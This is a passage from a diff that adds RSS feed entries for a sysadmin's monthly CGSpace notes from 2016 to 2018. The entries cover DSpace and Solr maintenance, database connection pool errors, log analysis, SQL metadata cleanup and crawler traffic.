+&lt;li&gt;http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Then I reduced the JVM heap size from 6144 back to 5120m&lt;/li&gt;
+&lt;li&gt;Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the &lt;a href=&#34;https://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible infrastructure scripts&lt;/a&gt; to support hosts choosing which distribution they want to use&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-04/</link>
+      <pubDate>Sun, 01 Apr 2018 16:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-04/</guid>
+      <description>&lt;h2 id=&#34;2018-04-01&#34;&gt;2018-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I tried to test something on DSpace Test but noticed that it&amp;rsquo;s down since god knows when&lt;/li&gt;
+&lt;li&gt;Catalina logs at least show some memory errors yesterday:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-03/</link>
+      <pubDate>Fri, 02 Mar 2018 16:07:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-03/</guid>
+      <description>&lt;h2 id=&#34;2018-03-02&#34;&gt;2018-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export a CSV of the IITA community metadata for Martin Mueller&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-02/</link>
+      <pubDate>Thu, 01 Feb 2018 16:28:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-02/</guid>
+      <description>&lt;h2 id=&#34;2018-02-01&#34;&gt;2018-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter gave feedback on the &lt;code&gt;dc.rights&lt;/code&gt; proof of concept that I had sent him last week&lt;/li&gt;
+&lt;li&gt;We don&amp;rsquo;t need to distinguish between internal and external works, so that makes it just a simple list&lt;/li&gt;
+&lt;li&gt;Yesterday I figured out how to monitor DSpace sessions using JMX&lt;/li&gt;
+&lt;li&gt;I copied the logic in the &lt;code&gt;jmx_tomcat_dbpools&lt;/code&gt; provided by Ubuntu&amp;rsquo;s &lt;code&gt;munin-plugins-java&lt;/code&gt; package and used the stuff I discovered about JMX &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-01/&#34;&gt;in 2018-01&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-01/</link>
+      <pubDate>Tue, 02 Jan 2018 08:35:54 -0800</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-01/</guid>
+      <description>&lt;h2 id=&#34;2018-01-02&#34;&gt;2018-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time&lt;/li&gt;
+&lt;li&gt;I didn&amp;rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&amp;rsquo;t show anything out of the ordinary&lt;/li&gt;
+&lt;li&gt;The nginx logs show HTTP 200s until &lt;code&gt;02/Jan/2018:11:27:17 +0000&lt;/code&gt; when Uptime Robot got an HTTP 500&lt;/li&gt;
+&lt;li&gt;In dspace.log around that time I see many errors like &amp;ldquo;Client closed the connection before file download was complete&amp;rdquo;&lt;/li&gt;
+&lt;li&gt;And just before that I see this:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Ah hah! So the pool was actually empty!&lt;/li&gt;
+&lt;li&gt;I need to increase that, let&amp;rsquo;s try to bump it up from 50 to 75&lt;/li&gt;
+&lt;li&gt;After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&amp;rsquo;t know what the hell Uptime Robot saw&lt;/li&gt;
+&lt;li&gt;I notice this error quite a few times in dspace.log:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &amp;#39;dateIssued_keyword:[1976+TO+1979]&amp;#39;: Encountered &amp;#34; &amp;#34;]&amp;#34; &amp;#34;] &amp;#34;&amp;#34; at line 1, column 32.
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;And there are many of these errors every day for the past month:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;#34;Error while searching for sidebar facets&amp;#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&amp;rsquo;s Encrypt if it&amp;rsquo;s just a handful of domains&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-12/</link>
+      <pubDate>Fri, 01 Dec 2017 13:53:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-12/</guid>
+      <description>&lt;h2 id=&#34;2017-12-01&#34;&gt;2017-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Uptime Robot noticed that CGSpace went down&lt;/li&gt;
+&lt;li&gt;The logs say &amp;ldquo;Timeout waiting for idle object&amp;rdquo;&lt;/li&gt;
+&lt;li&gt;PostgreSQL activity says there are 115 connections currently&lt;/li&gt;
+&lt;li&gt;The list of connections to XMLUI and REST API for today:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-11/</link>
+      <pubDate>Thu, 02 Nov 2017 09:37:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-11/</guid>
+      <description>&lt;h2 id=&#34;2017-11-01&#34;&gt;2017-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;The CORE developers responded to say they are looking into their bot not respecting our robots.txt&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-11-02&#34;&gt;2017-11-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Today there have been no hits by CORE and no alerts from Linode (coincidence?)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;#34;CORE&amp;#34; /var/log/nginx/access.log
+0
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Generate list of authors on CGSpace for Peter to go through and correct:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &amp;#39;contributor&amp;#39; and qualifier = &amp;#39;author&amp;#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-10/</link>
+      <pubDate>Sun, 01 Oct 2017 08:07:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-10/</guid>
+      <description>&lt;h2 id=&#34;2017-10-01&#34;&gt;2017-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter emailed to point out that many items in the &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/2703&#34;&gt;ILRI archive collection&lt;/a&gt; have multiple handles:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;There appears to be a pattern but I&amp;rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine&lt;/li&gt;
+&lt;li&gt;Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGIAR Library Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</link>
+      <pubDate>Mon, 18 Sep 2017 16:38:35 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</guid>
+      <description>&lt;p&gt;Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called &lt;em&gt;CGIAR System Organization&lt;/em&gt;.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-09/</link>
+      <pubDate>Thu, 07 Sep 2017 16:54:52 +0700</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-09/</guid>
+      <description>&lt;h2 id=&#34;2017-09-06&#34;&gt;2017-09-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-09-07&#34;&gt;2017-09-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Ask Sisay to clean up the WLE approvers a bit, as Marianne&amp;rsquo;s user account is both in the approvers step as well as the group&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-08/</link>
+      <pubDate>Tue, 01 Aug 2017 11:51:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-08/</guid>
+      <description>&lt;h2 id=&#34;2017-08-01&#34;&gt;2017-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours&lt;/li&gt;
+&lt;li&gt;I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)&lt;/li&gt;
+&lt;li&gt;The good thing is that, according to &lt;code&gt;dspace.log.2017-08-01&lt;/code&gt;, they are all using the same Tomcat session&lt;/li&gt;
+&lt;li&gt;This means our Tomcat Crawler Session Valve is working&lt;/li&gt;
+&lt;li&gt;But many of the bots are browsing dynamic URLs like:
+&lt;ul&gt;
+&lt;li&gt;/handle/10568/3353/discover&lt;/li&gt;
+&lt;li&gt;/handle/10568/16510/browse&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;The &lt;code&gt;robots.txt&lt;/code&gt; only blocks the top-level &lt;code&gt;/discover&lt;/code&gt; and &lt;code&gt;/browse&lt;/code&gt; URLs&amp;hellip; we will need to find a way to forbid them from accessing these!&lt;/li&gt;
+&lt;li&gt;Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): &lt;a href=&#34;https://jira.duraspace.org/browse/DS-2962&#34;&gt;https://jira.duraspace.org/browse/DS-2962&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;It turns out that we&amp;rsquo;re already adding the &lt;code&gt;X-Robots-Tag &amp;quot;none&amp;quot;&lt;/code&gt; HTTP header, but this only forbids the search engine from &lt;em&gt;indexing&lt;/em&gt; the page, not crawling it!&lt;/li&gt;
+&lt;li&gt;Also, the bot has to successfully browse the page first so it can receive the HTTP header&amp;hellip;&lt;/li&gt;
+&lt;li&gt;We might actually have to &lt;em&gt;block&lt;/em&gt; these requests with HTTP 403 depending on the user agent&lt;/li&gt;
+&lt;li&gt;Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415&lt;/li&gt;
+&lt;li&gt;This was due to newline characters in the &lt;code&gt;dc.description.abstract&lt;/code&gt; column, which caused OpenRefine to choke when exporting the CSV&lt;/li&gt;
+&lt;li&gt;I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using &lt;code&gt;g/^$/d&lt;/code&gt;&lt;/li&gt;
+&lt;li&gt;Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-07/</link>
+      <pubDate>Sat, 01 Jul 2017 18:03:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-07/</guid>
+      <description>&lt;h2 id=&#34;2017-07-01&#34;&gt;2017-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run system updates and reboot DSpace Test&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-07-04&#34;&gt;2017-07-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge changes for WLE Phase II theme rename (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/329&#34;&gt;#329&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Looking at extracting the metadata registries from ICARDA&amp;rsquo;s MEL DSpace database so we can compare fields with CGSpace&lt;/li&gt;
+&lt;li&gt;We can use PostgreSQL&amp;rsquo;s extended output format (&lt;code&gt;-x&lt;/code&gt;) plus &lt;code&gt;sed&lt;/code&gt; to format the output into quasi XML:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-06/</link>
+      <pubDate>Thu, 01 Jun 2017 10:14:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-06/</guid>
+      <description>2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&amp;rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &amp;ldquo;Research Themes&amp;rdquo; community will be renamed to &amp;ldquo;WLE Phase I Research Themes&amp;rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg.</description>
+    </item>
+    
+    <item>
+      <title>May, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-05/</link>
+      <pubDate>Mon, 01 May 2017 16:21:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-05/</guid>
+      <description>2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&amp;rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&amp;rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace.</description>
+    </item>
+    
+    <item>
+      <title>April, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-04/</link>
+      <pubDate>Sun, 02 Apr 2017 17:08:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-04/</guid>
+      <description>&lt;h2 id=&#34;2017-04-02&#34;&gt;2017-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge one change to CCAFS flagships that I had forgotten to remove last month (&amp;ldquo;MANAGING CLIMATE RISK&amp;rdquo;): &lt;a href=&#34;https://github.com/ilri/DSpace/pull/317&#34;&gt;https://github.com/ilri/DSpace/pull/317&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Quick proof-of-concept hack to add &lt;code&gt;dc.rights&lt;/code&gt; to the input form, including some inline instructions/hints:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2017/04/dc-rights.png&#34; alt=&#34;dc.rights in the submission form&#34;&gt;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;Remove redundant/duplicate text in the DSpace submission license&lt;/li&gt;
+&lt;li&gt;Testing the CMYK patch on a collection with 650 items:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &amp;#34;ImageMagick PDF Thumbnail&amp;#34; -v &amp;gt;&amp;amp; /tmp/filter-media-cmyk.txt
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-03/</link>
+      <pubDate>Wed, 01 Mar 2017 17:08:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-03/</guid>
+      <description>&lt;h2 id=&#34;2017-03-01&#34;&gt;2017-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run the 279 CIAT author corrections on CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-03-02&#34;&gt;2017-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace&lt;/li&gt;
+&lt;li&gt;CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles&lt;/li&gt;
+&lt;li&gt;They might come in at the top level in one &amp;ldquo;CGIAR System&amp;rdquo; community, or with several communities&lt;/li&gt;
+&lt;li&gt;I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?&lt;/li&gt;
+&lt;li&gt;Need to send Peter and Michael some notes about this in a few days&lt;/li&gt;
+&lt;li&gt;Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI&lt;/li&gt;
+&lt;li&gt;Filed an issue on DSpace issue tracker for the &lt;code&gt;filter-media&lt;/code&gt; bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: &lt;a href=&#34;https://jira.duraspace.org/browse/DS-3516&#34;&gt;DS-3516&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Discovered that the ImageMagic &lt;code&gt;filter-media&lt;/code&gt; plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK&lt;/li&gt;
+&lt;li&gt;Interestingly, it seems DSpace 4.x&amp;rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&amp;rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/51999&#34;&gt;10568/51999&lt;/a&gt;):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-02/</link>
+      <pubDate>Tue, 07 Feb 2017 07:04:52 -0800</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-02/</guid>
+      <description>&lt;h2 id=&#34;2017-02-07&#34;&gt;2017-02-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;An item was mapped twice erroneously again, so I had to remove one of the mappings manually:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# select * from collection2item where item_id = &amp;#39;80278&amp;#39;;
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Create issue on GitHub to track the addition of CCAFS Phase II project tags (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/301&#34;&gt;#301&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Looks like we&amp;rsquo;ll be using &lt;code&gt;cg.identifier.ccafsprojectpii&lt;/code&gt; as the field name&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-01/</link>
+      <pubDate>Mon, 02 Jan 2017 10:43:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-01/</guid>
+      <description>&lt;h2 id=&#34;2017-01-02&#34;&gt;2017-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error&lt;/li&gt;
+&lt;li&gt;I tested on DSpace Test as well and it doesn&amp;rsquo;t work there either&lt;/li&gt;
+&lt;li&gt;I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&amp;rsquo;m not sure if we&amp;rsquo;ve ever had the sharding task run successfully over all these years&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-12/</link>
+      <pubDate>Fri, 02 Dec 2016 10:43:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-12/</guid>
+      <description>&lt;h2 id=&#34;2016-12-02&#34;&gt;2016-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;CGSpace was down for five hours in the morning while I was sleeping&lt;/li&gt;
+&lt;li&gt;While looking in the logs for errors, I see tons of warnings about Atmire MQM:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&amp;#34;dc.title&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&amp;#34;THUMBNAIL&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&amp;#34;-1&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;I see thousands of them in the logs for the last few months, so it&amp;rsquo;s not related to the DSpace 5.5 upgrade&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;ve raised a ticket with Atmire to ask&lt;/li&gt;
+&lt;li&gt;Another worrying error from dspace.log is:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-11/</link>
+      <pubDate>Tue, 01 Nov 2016 09:21:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-11/</guid>
+      <description>&lt;h2 id=&#34;2016-11-01&#34;&gt;2016-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add &lt;code&gt;dc.type&lt;/code&gt; to the output options for Atmire&amp;rsquo;s Listings and Reports module (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/286&#34;&gt;#286&lt;/a&gt;)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/11/listings-and-reports.png&#34; alt=&#34;Listings and Reports with output type&#34;&gt;&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-10/</link>
+      <pubDate>Mon, 03 Oct 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-10/</guid>
+      <description>&lt;h2 id=&#34;2016-10-03&#34;&gt;2016-10-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Testing adding &lt;a href=&#34;https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing&#34;&gt;ORCIDs to a CSV&lt;/a&gt; file for a single item to see if the author orders get messed up&lt;/li&gt;
+&lt;li&gt;Need to test the following scenarios to see how author order is affected:
+&lt;ul&gt;
+&lt;li&gt;ORCIDs only&lt;/li&gt;
+&lt;li&gt;ORCIDs plus normal authors&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I exported a random item&amp;rsquo;s metadata as CSV, deleted &lt;em&gt;all columns&lt;/em&gt; except id and collection, and made a new coloum called &lt;code&gt;ORCID:dc.contributor.author&lt;/code&gt; with the following random ORCIDs from the ORCID registry:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-09/</link>
+      <pubDate>Thu, 01 Sep 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-09/</guid>
+      <description>&lt;h2 id=&#34;2016-09-01&#34;&gt;2016-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors&lt;/li&gt;
